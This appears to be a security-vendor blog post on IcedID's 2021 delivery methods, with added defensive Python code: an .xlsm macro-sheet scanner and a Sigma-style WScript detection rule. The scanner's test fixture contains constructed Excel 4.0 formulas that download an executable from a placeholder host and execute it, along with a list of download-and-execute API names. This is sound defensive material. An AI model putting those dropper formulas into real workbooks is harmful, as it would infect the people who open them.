IcedID Leverages Innovative Delivery Methods, Significantly Increases Infection Rates

Check Point Research's Global Threat Index for March 2021 shows the IcedID banking Trojan moving into the top tier of active malware. IcedID entered the Index for the first time last month and debuted in second place, right behind the well-established Dridex. The jump in infections and visibility is explained by the new delivery methods its operators have adopted. Security researchers believe this rapid build-up is driven by a push to fill the gap left by the Emotet botnet, which was disrupted in January 2021.

IcedID Banking Trojan

IcedID (aka BokBot) is a modular banking Trojan able to steal financial data and act as a dropper for second-stage malware. Since it first emerged in September 2017, the malware has been used in multiple campaigns aimed at banks, payment card providers, telecommunications vendors, and e-commerce sites, primarily in the U.S. Initially, IcedID was delivered by Emotet, but its operators have since adopted other delivery methods.

IcedID has broad credential-theft functionality that allows its operators to capture login credentials for online banking sessions, take over bank accounts, and automate fraudulent transactions. After infection, the malware propagates through the compromised network, monitors activity on the host, and conducts man-in-the-browser attacks. These attacks combine three techniques: web injection, a local proxy that intercepts browser traffic, and redirection of the victim to attacker-controlled pages. Together they let IcedID trick victims with social engineering and defeat multi-factor authentication while gaining access to bank accounts. To stay under the radar, IcedID hides its configuration using steganography and applies anti-VM and anti-debugging checks.

Notably, beyond its data-stealing functionality, the malware is increasingly used as a dropper for second-stage payloads. Security researchers believe the threat is moving towards a malware-as-a-service (MaaS) model, with several ransomware families already delivered through IcedID campaigns.

New Delivery Methods

After the Emotet botnet disruption in January 2021, the IcedID maintainers started to diversify their delivery methods to increase infection rates. Last month, security researchers from Uptycs identified a new IcedID campaign abusing Excel 4.0 (XLM) macros, which .xlsm workbooks still support and which execute as formulas placed in the cells of a macro sheet. Adversaries use this feature to run arbitrary code and download malicious executables from URLs. Over the preceding three months, Uptycs spotted 15K+ HTTP requests for malicious documents, most of which were Microsoft Excel spreadsheets.
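The page does not reproduce the Uptycs analysis, so here is an added triage check of my own (not code from Uptycs, SOC Prime, or the IcedID operators) showing where Excel 4.0 macros live inside an .xlsm and what a scanner looks for. An .xlsm is an OOXML zip; XLM macro sheets are stored as separate xl/macrosheets/*.xml parts (VBA, by contrast, lives in vbaProject.bin), each cell's formula sits in an <f> element, and the macro sheet is usually declared hidden or veryHidden in xl/workbook.xml. The sample workbook, the URL, the file paths and the formulas below are constructed for the example; the token list is my own choice of XLM functions and Win32 API names commonly used to fetch and run a payload.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Excel 4.0 (XLM) functions and Win32 API names that let a macro sheet run code or fetch a payload
# (my own selection for this example, not an exhaustive list).
SUSPICIOUS_TOKENS = ("EXEC(", "CALL(", "REGISTER(", "FORMULA(", "URLDOWNLOADTOFILE", "SHELLEXECUTE")
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)


def _local(tag: str) -> str:
    """Strip the XML namespace so tags match whether or not a default namespace is declared."""
    return tag.rsplit("}", 1)[-1]


def scan_xlsm(data: bytes) -> dict:
    """Inspect an .xlsm (OOXML zip) for Excel 4.0 macro sheets and what their formulas would do."""
    report = {"macrosheets": [], "hidden_sheets": [], "suspicious_formulas": [], "urls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # XLM macro sheets are separate parts under xl/macrosheets/, never under xl/worksheets/
        report["macrosheets"] = sorted(
            n for n in names if n.startswith("xl/macrosheets/") and n.endswith(".xml")
        )
        if "xl/workbook.xml" in names:
            for el in ET.fromstring(zf.read("xl/workbook.xml")).iter():
                if _local(el.tag) == "sheet" and el.get("state") in ("hidden", "veryHidden"):
                    report["hidden_sheets"].append(el.get("name"))
        for part in report["macrosheets"]:
            for el in ET.fromstring(zf.read(part)).iter():
                if _local(el.tag) != "f":  # <f> holds the cell formula; <v> only holds the cached value
                    continue
                formula = (el.text or "").strip()
                if any(tok in formula.upper() for tok in SUSPICIOUS_TOKENS):
                    report["suspicious_formulas"].append(formula)
                report["urls"].extend(URL_RE.findall(formula))
    return report


def is_suspicious(report: dict) -> bool:
    """A macro sheet is rare in modern workbooks; hidden plus code/URL formulas is the delivery pattern."""
    return bool(report["macrosheets"]) and bool(
        report["hidden_sheets"] or report["suspicious_formulas"] or report["urls"]
    )


def build_sample_xlsm(with_macro: bool = True) -> bytes:
    """Constructed workbook mimicking the OOXML part layout of an .xlsm (not a real sample)."""
    ns = (
        'xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"'
    )
    sheets = '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
    if with_macro:
        # veryHidden sheets cannot be unhidden from the Excel UI, a common trick for macro sheets
        sheets += '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
    workbook = f"<workbook {ns}><sheets>{sheets}</sheets></workbook>"
    # Constructed XLM: download a file via urlmon, execute it, then stop. URL and paths are placeholders.
    macrosheet = (
        f"<macrosheet {ns}><sheetData>"
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
        '"http://example.invalid/update.dat","C:\\Users\\Public\\update.exe",0,0)</f><v>0</v></c></row>'
        '<row r="2"><c r="A2"><f>EXEC("C:\\Users\\Public\\update.exe")</f><v>0</v></c></row>'
        '<row r="3"><c r="A3"><f>HALT()</f><v>0</v></c></row>'
        "</sheetData></macrosheet>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/worksheets/sheet1.xml", f"<worksheet {ns}><sheetData/></worksheet>")
        if with_macro:
            zf.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


if __name__ == "__main__":
    report = scan_xlsm(build_sample_xlsm())
    print("suspicious" if is_suspicious(report) else "clean", report)
```

The check deliberately keys on structure rather than strings: the presence of any xl/macrosheets/ part is itself the signal, since legitimate modern workbooks almost never carry XLM sheets, and the hidden-sheet and formula-token checks only raise the confidence. Obfuscated XLM (formulas assembled with CHAR() and FORMULA() at run time) will still show the macrosheet part even when the URL regex finds nothing, which is why the verdict does not depend on the URL list.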

Furthermore, in April 2021, Microsoft described an even more unusual delivery method for IcedID. In this campaign, the operators abused website contact forms to target businesses of various sizes: by submitting the forms, they had the target's own site send the attackers' message, so the email arrived through legitimate infrastructure. The messages claimed a legal threat, specifically a copyright infringement, and contained a malicious URL leading to a Google-hosted page. If the user followed the link, the page served a ZIP archive containing a heavily obfuscated JS file. Once extracted and opened, the JS file ran under WScript and downloaded the final IcedID payload.
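The rule names in the detection section below point at content on the SOC Prime platform, which the page does not reproduce. As an added example of my own (not the Threat Bounty rules by Osman Demir, and not SOC Prime code), here is the detection logic for the zipped-JS stage above expressed as a minimal Sigma-style rule and a tiny matcher for its map/modifier syntax, run over constructed process-creation events using Sysmon Event ID 1 field names. The events, paths and user name are invented; the %TEMP%\Temp1_<archive>\ location is what Explorer's Compressed Folders handler uses when a file is opened directly from inside a ZIP, which is exactly how a victim double-clicking the JS in the archive would launch it.

```python
from fnmatch import fnmatchcase

# Constructed process-creation events in Sysmon Event ID 1 field names (not real telemetry).
EVENTS = [
    {   # JS opened straight from the ZIP in Explorer: extracted to %TEMP%\Temp1_<archive>\ and run by WScript
        "Image": "C:\\Windows\\System32\\wscript.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": '"C:\\Windows\\System32\\WScript.exe" '
                       '"C:\\Users\\alice\\AppData\\Local\\Temp\\Temp1_legal_notice.zip\\legal_notice.js"',
    },
    {   # Benign logon script: same script host, but a .vbs from a system path
        "Image": "C:\\Windows\\System32\\wscript.exe",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "wscript.exe //B C:\\Windows\\Scripts\\logon.vbs",
    },
    {   # Archive tool opening the same ZIP: not a script host, must not fire
        "Image": "C:\\Program Files\\7-Zip\\7zFM.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": '"C:\\Program Files\\7-Zip\\7zFM.exe" C:\\Users\\alice\\Downloads\\legal_notice.zip',
    },
]

# My own Sigma-style rule for this example; it is not the Threat Bounty rule referenced on the page.
RULE = {
    "title": "Windows Script Host running JavaScript from an archive or download location",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "script_host": {"Image|endswith": ["\\wscript.exe", "\\cscript.exe"]},
        "js_file": {"CommandLine|contains": [".js", ".jse"]},
        # Assumed user-writable locations; \Temp1_ is Explorer's extraction folder for files opened inside a ZIP
        "user_path": {"CommandLine|contains": ["\\AppData\\Local\\Temp\\", "\\Downloads\\", "\\Temp1_"]},
        "condition": "script_host and js_file and user_path",
    },
}


def _field_matches(event: dict, key: str, patterns) -> bool:
    """Match one 'Field|modifier' entry. Sigma string matching is case-insensitive."""
    field, _, mods = key.partition("|")
    modifiers = mods.split("|") if mods else []
    value = str(event.get(field, "")).lower()
    hits = []
    for pat in (patterns if isinstance(patterns, list) else [patterns]):
        pat = str(pat).lower()
        if "contains" in modifiers:
            hit = pat in value
        elif "endswith" in modifiers:
            hit = value.endswith(pat)
        elif "startswith" in modifiers:
            hit = value.startswith(pat)
        else:
            hit = fnmatchcase(value, pat)  # plain value: Sigma-style * and ? wildcards
        hits.append(hit)
    return all(hits) if "all" in modifiers else any(hits)  # list of values is OR unless |all


def _selection_matches(event: dict, selection: dict) -> bool:
    """Every field entry inside one selection map must hold (AND semantics)."""
    return all(_field_matches(event, k, v) for k, v in selection.items())


def _condition_holds(results: dict, condition: str) -> bool:
    """Evaluate a conjunction-only condition such as 'a and b and not c'; other forms are rejected."""
    for term in condition.split(" and "):
        term = term.strip()
        negate = term.startswith("not ")
        name = term[4:].strip() if negate else term
        if name not in results:
            raise ValueError(f"unsupported condition term: {term!r}")
        if results[name] == negate:  # a negated hit or a missing positive hit fails the conjunction
            return False
    return True


def run_rule(rule: dict, events: list) -> list:
    """Return the events that satisfy the rule's selections and condition."""
    detection = rule["detection"]
    selections = {k: v for k, v in detection.items() if k != "condition"}
    hits = []
    for event in events:
        results = {name: _selection_matches(event, sel) for name, sel in selections.items()}
        if _condition_holds(results, detection["condition"]):
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in run_rule(RULE, EVENTS):
        print(RULE["title"], "->", hit["CommandLine"])
```

Only the first event fires: it is a script host, the command line names a .js file, and the file sits in the Temp1_ extraction folder. The logon script fails the .js check and the path check, and the archive tool fails the image check. In production the "js_file" selection should be tightened (".js" also matches ".json"), and adding ParentImage endswith \explorer.exe as an optional selection captures the user double-click that distinguishes this delivery from scheduled or scripted WScript usage.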

IcedID Detection

To stay ahead of the new IcedID infection methods, you can download the tailored Sigma rules released by our Threat Bounty developer Osman Demir.

IcedID (BokBot) from Zipped JS File

IcedID Campaign Spotted Being Spiced with Excel 4 Macros

Malspam Campaign Drops IcedID and Leads to REvil Ransomware

Also, you can check the full list of IcedID detections available in Threat Detection Marketplace.

Get a free subscription to our Detection as Code platform to boost your cyber defense capabilities and reduce the mean time to detect attacks. Our industry-first SOC content library aggregates 100K+ rules, parsers, and search queries mapped to CVE and the MITRE ATT&CK® framework. Over 300 contributors enrich the library each day to enable continuous detection of the most alarming cyber threats. Eager to contribute to threat hunting initiatives and craft your own Sigma rules? Join our Threat Bounty Program!
